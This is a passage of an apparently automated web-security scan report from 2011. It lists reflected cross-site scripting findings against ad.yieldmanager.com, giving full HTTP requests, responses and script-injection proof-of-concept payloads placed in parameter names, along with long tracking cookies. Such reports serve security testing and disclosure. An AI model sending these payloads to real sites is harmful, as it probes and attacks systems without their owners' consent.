Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=Dza9cImQIgAOYp1sdVBFKJ3j2mm-3nw5DLdjMDY9RiDfaqaDzVRu9ZiuBStYaftY-vQa-Lrt8AEh2sMWSofalPWfoLMBxH0g9IiAwEZtd5YPMEpw2Dimbl_Ar_3pbVlWCr9zpcNmhJ4YALFsRS0OjTgV6OPboE5AailwYD2p-IySdlkZutLQ7ZQ85RG7C4VB2qlA743KvZ39ywpdZbpMhh0Lmtiu91APHHd__cAh9gz07Cd5Zg6Jg2z-OuW7NiYiFK2x3qhPSvxxgQjvFMzvNsv0sG_uSycuZycGHG0i9JDVJjS_HVyCCR3CpH4C_z7OWENSx6qTFa7od7SUHN9Egei6BZRgi_D5YzTOICCuYCx9jiGo5Ucxoan5H4AQ_xV3iHql4u4O7_sSYdnd02k2DNQHkfpT4yC0sBHWKifDZRo8VXe-PeWk1nfFtbmH7GvZ1QMXO5GUno07zoygwBocRoTsxUcxWk5nbrSqN6k58j1TORmwcQ4tlm0RwihyF_UsCL2x9N8rCbkNMc9dtlOLKF16IBansyDt77nh-l623XjbgLPXgE5UhrKbb-yapi7Iz_t1m3RC9HNVGEroWY24Hx0ymz9iB_PZ274hwZ5aW0QB1cBEZ955Qck8jqa4MZ7v1aY1ttiEjhYPnmeJ7sqVaGWGUflWpKK8ZDluGXe-OMAMpHNeDinV6bUD4c7xTKPYqOV7QZ7aFBA3m0phFzvLGUyTINTvrbznNuEHAKkRnaoKqQQIp4dB6WERi9SKRUeAKB26GseFkfH7OU-Y9jArFwJN1aNKu26HMlC2vlBlEo3AibJolRtP9GKY2j0AIA4QF0ROUKwFAxzf5GHHC-l2sUbwMrieaxWXba1ERSK3tWWrKuMIkiwSl3Te1VhilaTSnNbIlFewbQ0HwOyAYWPKVOFzsrgdqMMSA-afxC3bSvIKc60386S8NF-JuqnS_gYeiHql4u4O7_sSYdnd02k2DGktwZFEgr-H1aRa-v8iL2Y8VXe-PeWk1nfFtbmH7GvZojS9aaLdC4dIDTz1p5oDzGZlZrZQz9gqPi_YpBWRR_zyJstfeR3BF0X80yINyf_bnscLz8pWZl03MCHITMyErF16IBansyDt77nh-l623XgQrvHzCa6-Ar3OKf1u5O9co8jF4KazkjYUhi9Y-2cpubMeTwvrsn6UDDgstfmlQPoNQYQoyiD68kJjw-yNw0ZU1aY1ttiEjhYPnmeJ7sqVaHrw4FE_cCyjpsbZ3unV7uMrdoKrhpnovF-eFvpriEhVrMfpGoruuBgzA1-jEhdCS2wFnaEJ_77D-SBSvq4apv0KqQQIp4dB6WERi9SKRUeApAoLbAXgH3MAg4fG-53hwYWvZ7p1zrzJVM0-BhBuMNYrc7Kk7dBes7lnotHfeZ9VkUKGgPT-wupZmNTexU6iznjzwSpHwNAhjAO4xxi375pcdR85v5iezdnNkxnuNwjFRvAyuJ5rFZdtrURFIre1ZZBSlbvBC0evnYqUUsRvAsWc1siUV7BtDQfA7IBhY8pUNZFdTBAhalBFYq3Dyxi9TBfNNCsQZvwCdk93ue_PwR2IeqXi7g7v-xJh2d3TaTYMVxQyOpakzryCsBb1QMcxxTxVd7495aTWd8W1uYfsa9lUSQm6Px99bWr2RVRxuk2yEM0JJ22tYCLP7uBw8UeaI1M5GbBxDi2WbRHCKHIX9Sz_QtJiSnym5S_qsqKzl484XXogFqezIO3vueH6XrbdeBrsNvqpBtQW35VrocWM1hJEMrVYqmvz7xJtELJ71uRTTECD0HA2vYVMATXXOR4kic7TP4ECMD5bQt22Ufb1ASjVpjW22ISOFg-eZ4nuypVoX3-sqUKgtXKTyeeAJ3WoNBTpFHNeMdsJNdx7bmFAC56JAHYn97lyiGJ5XDJCkUNkw_be5i-Fx9NF-BKeFGAMPAqpBAinh0HpYRGL1IpFR4AB4o7EViaAPEO7EwRwSKXjmcb3GKio9SBOsgaqPfeFsasCu54shXpdyVhXu91m5wiW91g1mAzej0c7wnGxz5vZRvAyuJ5rFZdtrURFIre1ZfDRnDTWzff-YlyXP_zUgfGc1siUV7BtDQfA7IBhY8pUeWxnJe61Raa9uTyiNiaLtdI3rxLW4kElZ2z2lu4o7hWIeqXi7g7v-xJh2d3TaTYML11pzoZIlFkYCIGVGm_tUjxVd7495aTWd8W1uYfsa9nlK9dyZVYIz5pmDpzdU80QQkZpM_cVFXYTcTTPOspL-TBLfO2ZZ5wOsMI8xMfjrvrnuyo8Yez2B_AzlVUYglieXXogFqezIO3vueH6XrbdeOZqLTJ2eUC5VtOBQseHiE81nClsShNFF0lz8B3FOROwHTKbP2IH89nbviHBnlpbRDDco7mBS3_DJ0ZnqsKZKeTVpjW22ISOFg-eZ4nuypVotMax7cw1A0lomZOewLLuUzHWvz6IKIMXKnKL80iX025NYG1qkKS0O8LGs7luRUbTpMVbMDENDpvIJh2_kOeZwWW0-b-WJf0ZFlMOgj84vlCimF9cP6eLyeThS4cELoZF7hIMY-yiS6od8aiwiVy6K8hyJ0-yKCmYc6DEnkoIDjLUURQ9jCbj0adNONAbHq6OIauKDPsVyaYkWyAz1a3QLsZ0HFEk9FUwZlIZoC4PKchFMfXO25PtkA1FJuDF1eIqRRk7NbH_3KXaXpegXdoohM0M5HiSWAEvqit8JfBxvjBBCecmNOFvmnxZXlybKUM3qIhRpr8zAond1hyHy2KCxQ9jRTaSUh9q8NAYC-8-qkSZEZsmx23qKVCrqZDyeipaIi4-WrfUh7IPblkcEwLIfWk4JnPVlR_zGm4PPqzfx4-ZPuIxR87K17SR-59M9UpIVvIMltY5lVfKu7zjIgIpMBKB2P8TaeZb5SMS1Kn2fJf0-MGZW4U9vWHTndk9ZYnTYKRbzB2AW8sPYtx1gLnWIDsYBLT8b4yTE_t-fjXYNBuH2MTsqi1WP1f5naPDjKNVGGv49osHpNOU5hR-g_XrO60jJc9MudtXKgUybYsjSwmSw3Whqt4otLu1R9f4pMroY6TrnX9AFtcCOq4KtB3OqN2gLia6NWPazuloW1Dp_gmgtfmkSSGnmz7Ck--msIbUItDCaX4V_0YzpDgobT5myGAQ1jpLDCI7HiZjNNO0_95EX9SUHeo0SvSjgEUZJK2gWAKmardOPRrryF1DhECcp1-YMQnoV4ZAArTQ0YurxnNN6cMRpOMh2nE5XzpH9jU_75X6gaFQNyuWz4EiPqighnBW1K7ySrDy2erbCyocIlO9iKCeGUvo-FRYRZN7b2HzshKpWim7EvVYj9LxNPbnlLRl7SF6Fz-Cqk4ilR2m1sd6XpoV6J-HdTmFEl8Fex_S_sTGaqkuGDnpWV_Epn14CgCD-1Od2j93-G993DJLn6laQk0A_YEjXCNxN4ufXJe2s8taXVc1ZwCaKwQ-ReuFBa_BvA0MPyd7JlyBvMOrx4RsY1dMYwNR_ohNoy9a29HQKTTBeSdexy7NjxMrQdbG848mPsvXEVp1Zp9tlw0PafTHwRamGgGanwtSRVH2wEa3NxSTCsrM00Brun6QttnrZ4i40yYFMUM2IND36b7ZFw4; fc=qPpK4X8K7ZjxVx0VJZDcdB_D1mN3lHI_BinJ1LdrOAbDh9xILOy7cWXWYifPzZ3iZjzoSdlEeqq3zCQrton2D32iD1a2418t8vlUtDGalV-JhisFugd5-2PmgEb-dzYcx_84B0Gt7iZQiKNqGC2CofHgZs6hnwrt4AvKtyKV8klPR1hRXEWvUhiTNhz33U4d9hTEpcCaiTjdUImk_rGRYl95QzLPGgcS4PLuvzPSDFoeX72gpvVoMR_dT1IU83itQkcPCNDBJR1s8ojl7c8L5k9KWBxjpL-6lYKR74fQmyE; pf=WmCQSJv_88YAF1TaCEjacvtFyKtKd3nkimHPVBGJrCArW05u4B9BwnHxy5LHSNbs0PyvhiQ9hEGFvp1qMvxzBcdiicNNmmE_aI2n_-oR-aRG9eqUO6PdyPlHytyWBeL6pt4N9d3OY-Qo6M3zGftguNTbm-VGCKrn7KG61o8a-hlxQgbL-MXnxJnxbWK81XM2fNbwnskl80J7FrpArydV4msv5xJnc6wiNkkgoc9ZHAqEvAXfc_b9CYsOLM4ObfRS-yQ0IxDS6yGV0bt0Oz4pJzQ3Hu9GorHJq3pkzhhXE4dM0xncvVUD6tMlnnlm_qWsojASvNxNlCtZvel71OhRg1_acYxwuGBwWmnpT3WVNmeWKUlZO7GlHHuYkG_xUYpdlRr7vUCIaoiDaMmpt_PvLCOUyLGtO0hHJuwGY5T09JX2RCeAmas1by9-2jjXtHbxIU6XTk6RPEnQXT9x2zEmWfAeEJZ2W4XMeMQpqzhWB_34UH3sPqU14UWUW_0z8Z0heNyepssmwJo9AEHB3dcHG8NqNopQF7bmOYrUClo2LIAxUFIqqMfzF-f5IilV9DF2EEtf1qwB8GY1P6ISMC2NEE-NukVybOAFf3snxZsusnThrdw025CqgpXbAJf_ZgK04z5LE7vpNsVQaepPKy5giom1bq2yFvVGruUD-0Zmu_IOz-UlYiPBN7JyoSoKGJwMowB-sj_YCAwsoyO3MSAriA-6SvpE8vfm17M_AiAxw4nAd1Y9GjRixW8BKZaPBicaTSnQ_qW1THdHtsDrSOwE7yWjUosqwui97JSt4J0g_MOMd0ReLIPTEksHwzd4gYkpoMm2n6Nulr0bAVvGt4WcZWdCKTjb3Ww3q4Lyh_VyGMuPK371XlXjo5X46eVqRbV699MOJ5eDdshYLSs5LFoOgILjO_vdFh0XnPmUquTICkH1HrsiJSZNWOX0SyN8dywaeYYZUTlRetsuBzMcxMWLQLNyiRU1bJ5Qpb7GomgPhXBwcMjXa09KP5HzekSxDcQK0SJw0JMmSyeQM3pYTVx-Ci-FU5aKfMy17HNvPHxNvxNrRXY1izURX-lyALi1AlxuBXTDiJUS-OqKWjm2DD4CuggKG3dUzHMmu04fSX5Ad4nEc6NlGzZLMuoExgCCt30kp2pmOmYcQYMZyZ05DubgihMl8PJOwcr8ldScAKqk7rGGnUh27gMWCyrnP1Di5AGzTucfcXTrqV1UJKyBhGxFYcQFai9M2J3rqJmFUgQdN5ATDIRwfK3uozaJUKhU4qVipaL_GD-TOTelik5DYCvXIYIInb3nfIa-ebQa7olHWWH486R4yxje4LN8GWCWWRe4IR0I9DtTjuVzRJkyZ8n66XpUPlCRi3tlvuMEH6BKrtjGsUA2wOoIXFuaM_JUwMHDgab4_aPrZdgl9Uf7tvD9rgyRTxnR6YKNm8Gu6ALXRmCYGTIP8i-wsqx8QkqNgi0F_hs9UZaVZDpy-HyTAsx-Y51cz4yJITcb0FaAWC4QbaWSbbOECFNVbSmOiTVVH4eEKD1WvX5M7UplxrzwIhN9Mwkgo1sMiNanUUl1UyNj_Qxjp4iBCha2ShvDZxpY4-NTPO_cWHxychz2AkV4XXIJ0g; uid=2931142961646634775; rrs=1%7C2%7C3%7C4%7C1002%7C6%7C7%7C7%7C9%7C1001%7C1006%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7C1007%7C1008; rds=15093%7C15093%7C15093%7C15104%7C15085%7C15097%7C15097%7C15082%7C15093%7C15093%7C15091%7C15093%7C15093%7C15093%7Cundefined%7C15093%7Cundefined%7C15097%7C15093; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Sat, 05-Nov-2011 14:00:11 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:11 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=4537377354125894831&fpid=a0bfe"><script>alert(1)</script>10708fa3251&nu=n&t=&sp=n&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...
3.24. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f258"><script>alert(1)</script>bb97804a671 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=468x60&section=1384085&2f258"><script>alert(1)</script>bb97804a671=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.surphace.com/ads/rubicon_orlandosentinel
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; pv1="b!!!!-!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!!J<[!,M,<!$LQ^!,+Z*!$%hK~!#1g.)di=:!ZmB)!%mdT!$hK:~~~~~~<xl/w<y-(rM.jTN!!L7_!,M,<!$LQ^!,+Z*!$%hK~!#1g.)di=:!ZmB)!%mdT!$hK:~~~~~~<xl/w<yjn9M.jTN!#mP:!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mP>!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPA!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPD!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPG!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPJ!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#p!r!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<xtrb!!.vL"; ih="b!!!!?!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+Z*!!!!$<xl/w!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!0eUu!!!!#<y]8.!0ji6!!!!'<xqS_!0ji7!!!!%<xqRm!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1kC+!!!!%<xqSY!1kC5!!!!#<xqR`!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM"; bh="b!!!%/!!!?H!!!!%<wR0_!!*oY!!!!'<ypn'!!-?2!!!!-<ypn'!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!(<ypn'!!0O4!!!!)<y]81!!0O<!!!!/<y]81!!0P,!!!!#<x4hf!!1Mv!!!!$<y45e!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!=cS!!!!'<yV[r!!?VS!!B1c<xl.o!!J<=!!!!/<y]81!!J<E!!!!/<y]81!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!(<ypn'!!PL`!!!!$<y461!!RZ(!!!!)<xt,H!!VQ(!!!!#<wYkr!!Zwb!!!!%<ypn'!!`4u!!!!%<y66/!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!0<y]81!!q:E!!!!-<y]81!!q<+!!!!.<y]81!!q</!!!!.<y]81!!q<3!!!!.<y]81!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tjQ!!!!(<ypn'!!ucq!!!!/<y]81!!vRm!!!!)<y]81!!vRq!!!!)<y]81!!vRr!!!!)<y]81!!vRw!!!!/<y]81!!vRx!!!!)<y]81!!vRy!!!!)<y]81!!w3l!!!!(<ypn'!!wQ3!!!!(<ypn'!!wQ5!!!!(<ypn'!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!)<y]81!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xb!!!!#<yMiw!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#1*C!!!!%<ypn'!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2Rn!!!!#<x2wq!#2XY!!!!)<y]8:!#2YX!!!!#<vl)_!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!)<y]81!#48w!!2s=<xrZD!#4`K!!!!#<x2wq!#5(U!!!!#<x,:<!#5(^!!!!#<x31-!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!)<y]81!#7.'!!!!)<y]81!#7.:!!!!)<y]81!#7.O!!!!)<y]81!#8>*!!!!#<x2wq!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#KjQ!!B1c<xl.o!#Km/!!!!#<xl/o!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!)<y]81!#MTF!!!!)<y]81!#MTH!!!!)<y]81!#MTI!!!!)<y]81!#MTJ!!!!)<y]81!#MTK!!!!#<w>/m!#M]c!!!!)<xt,H!#Mr7!!!!#<w>/l!#N44!!!!#<x2wq!#N45!!!!#<xr]M!#O29!!!!%<ypn'!#O>d!!C`.<xrYg!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!/<y]81!#SF3!!!!/<y]81!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!)<y]81!#UDP!!!!/<y]81!#UZs!!!!#<yjEy!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#YCg!!!!#<x2wq!#Z8A!!!!%<ypn'!#ZPp!!!!#<y,`,!#[L>!!!!%<w[UA!#]%`!!!!$<xtBW!#]@s!!!!%<whqH!#]Z!!!!!%<ypn'!#^@9!!!!#<x2wq!#^bt!!!!%<xr]Q!#^d6!!!!$<xtBW!#`-7!!!!%<ypn'!#`S2!!!!(<ypn'!#`U0!!!!'<ypn'!#`U9!!!!%<ypn'!#a'?!!!!#<w>/m!#a4,!!!!#<y,`,!#a=6!!!!'<ypn'!#a=7!!!!'<ypn'!#a=9!!!!'<ypn'!#a=P!!!!'<ypn'!#aCq!!!!(<w[U@!#aG>!!!!+<xt,H!#ah!!!!!)<y]81!#ai7!!!!)<y]81!#ai?!!!!)<y]81!#b:Z!!!!#<x2wq!#b<_!!!!#<x3.t!#b<`!!!!#<x,:<!#b<a!!!!#<x,:<!#b='!!!!#<x3.t!#b=*!!!!#<x,:<!#b=E!!!!#<x31-!#b=F!!!!#<x3.t!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c-u!!!!-<w*F]!#c8V!!!!%<ypn'!#c8W!!!!%<ypn'!#c8X!!!!%<ypn'!#c8]!!!!%<ypn'!#c?c!!!!)<y]81!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e9?!!!!#<y,`,!#eLS!!!!#<yjEE!#ePa!!!!#<xr]M!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#fG)!!!!%<ypn'!#fG+!!!!'<ypn'!#g=!!!!!%<ypn'!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#gsr!!!!#<x2wq!#h.N!!!!#<yMiw!#k]4!!!!#<x2wq!#l)E!!!!#<y,`,!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#ne_!!!!%<ypn'!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p7'!!!!#<yMiw!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!)<y]81!#sAb!!!!$<y46(!#sAc!!!!$<y46(!#sC4!!!!$<y46(!#sax!!!!#<xd-C!#tLy!!!!)<y]81!#tM)!!!!)<y]81!#tn2!!!!)<y]81!#uE=!!!!#<x9#K!#uJY!!!!/<y]81!#uR3!!!!%<ypn'!#ujQ!!!!%<ypn'!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#v,Z!!!!#<xt>i!#vyX!!!!)<y]81!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#xI*!!!!+<xt,H!#xIF!!!!,<y]81!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!8/!!!!#<xl.y!$!:w!!!!#<x2wq!$!:x!!!!#<xr]M!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#B>!!!!$<ypn'!$#R7!!!!)<y]81!$#S3!!!!#<y,`,!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!)<y]81!$(!P!!!!(<ypn'!$(+N!!!!#<wGkB!$(Gt!!!!,<y]81!$(S9!!!!%<ypn'!$(Tb!!!!#<yQLc!$(V0!!!!%<y*E<!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)DI!!!!#<x2wq!$)GB!!!!(<ypn'!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q!$*hf!!!!%<ypn'"; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:27 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 09 May 2011 14:00:27 GMT
Pragma: no-cache
Content-Length: 4690
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...
<a href="http://ad.yieldmanager.com/imageclick?2f258"><script>alert(1)</script>bb97804a671=1&Z=468x60&s=1384085&t=2" target="_parent">
...[SNIP]...
3.25. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f2c2"-alert(1)-"6ceae886f18 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=468x60&section=1384085&8f2c2"-alert(1)-"6ceae886f18=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.surphace.com/ads/rubicon_orlandosentinel
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; pv1="b!!!!-!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!!J<[!,M,<!$LQ^!,+Z*!$%hK~!#1g.)di=:!ZmB)!%mdT!$hK:~~~~~~<xl/w<y-(rM.jTN!!L7_!,M,<!$LQ^!,+Z*!$%hK~!#1g.)di=:!ZmB)!%mdT!$hK:~~~~~~<xl/w<yjn9M.jTN!#mP:!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mP>!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPA!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPD!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPG!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPJ!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#p!r!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<xtrb!!.vL"; ih="b!!!!?!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+Z*!!!!$<xl/w!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!0eUu!!!!#<y]8.!0ji6!!!!'<xqS_!0ji7!!!!%<xqRm!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1kC+!!!!%<xqSY!1kC5!!!!#<xqR`!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM"; bh="b!!!%/!!!?H!!!!%<wR0_!!*oY!!!!'<ypn'!!-?2!!!!-<ypn'!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!(<ypn'!!0O4!!!!)<y]81!!0O<!!!!/<y]81!!0P,!!!!#<x4hf!!1Mv!!!!$<y45e!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!=cS!!!!'<yV[r!!?VS!!B1c<xl.o!!J<=!!!!/<y]81!!J<E!!!!/<y]81!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!(<ypn'!!PL`!!!!$<y461!!RZ(!!!!)<xt,H!!VQ(!!!!#<wYkr!!Zwb!!!!%<ypn'!!`4u!!!!%<y66/!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!0<y]81!!q:E!!!!-<y]81!!q<+!!!!.<y]81!!q</!!!!.<y]81!!q<3!!!!.<y]81!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tjQ!!!!(<ypn'!!ucq!!!!/<y]81!!vRm!!!!)<y]81!!vRq!!!!)<y]81!!vRr!!!!)<y]81!!vRw!!!!/<y]81!!vRx!!!!)<y]81!!vRy!!!!)<y]81!!w3l!!!!(<ypn'!!wQ3!!!!(<ypn'!!wQ5!!!!(<ypn'!!wcu!!